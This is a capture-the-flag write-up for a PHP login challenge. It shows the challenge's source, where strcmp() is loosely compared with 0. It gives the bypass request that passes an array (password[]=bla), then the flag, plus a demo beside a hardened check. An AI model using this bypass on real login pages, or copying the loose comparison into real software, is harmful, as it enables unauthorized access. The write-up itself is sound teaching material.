L33t H4xx0r
Challenge
If you could bypass the login you could get the flag. Link
Solution
We get to a webpage with a password field and the message "Seems like your not a haxxor". We are also given the source:
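<?php
// The flag and the password are read from the same file
$FLAGWEB6 = (file_get_contents("flag.txt"));
$PASSWORD = (file_get_contents("flag.txt")); //haha
if(isset($_GET['password'])){
    // Loose comparison (==) of strcmp()'s return value against 0;
    // $_GET['password'] is never checked to be a string
    if(strcmp($PASSWORD, $_GET['password']) == 0){
        $success = true;
    }
    else{
        $success = false;
    }
}
else {
    $success = false;
}
?>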
We see that they use the strcmp function to check the password. We can bypass this by supplying an array named password instead of a string, which makes the strcmp(...) == 0 check pass.
http://yrmyzscnvh.abctf.xyz/web6/?password[]=bla
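The same check beside a hardened form, as an added example that is not part of the original writeup; `check_vulnerable`, `check_hardened` and the secret value are hypothetical names and constructed data. On PHP versions before 8, `strcmp()` given an array returns NULL and `NULL == 0` is true; on PHP 8 and later the call throws a `TypeError`, which the demo catches so it runs on both.

```php
<?php
// Added example: hypothetical function names, constructed secret and inputs.

/** The page's pattern: strcmp() result loosely compared with 0. */
function check_vulnerable(string $secret, $input): bool
{
    try {
        // PHP < 8: array argument => warning + NULL, and NULL == 0 is true.
        return @strcmp($secret, $input) == 0;
    } catch (TypeError $e) {
        // PHP >= 8: array argument raises TypeError, so no bypass.
        return false;
    }
}

/** Hardened: require a string, then compare strictly and in constant time. */
function check_hardened(string $secret, $input): bool
{
    if (!is_string($input)) {
        return false; // arrays (password[]=...) and missing values are rejected
    }
    return hash_equals($secret, $input);
}

$secret = 'constructed-secret'; // stands in for the contents of flag.txt

// Constructed query strings, parsed the same way PHP fills $_GET.
$requests = [
    'password=wrong',
    'password=constructed-secret',
    'password[]=bla',
];

foreach ($requests as $qs) {
    parse_str($qs, $get);
    $input = $get['password'] ?? null;
    printf(
        "%-30s type=%-6s vulnerable=%-5s hardened=%s\n",
        $qs,
        gettype($input),
        var_export(check_vulnerable($secret, $input), true),
        var_export(check_hardened($secret, $input), true)
    );
}
```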
Flag
abctf{always_know_whats_going_on}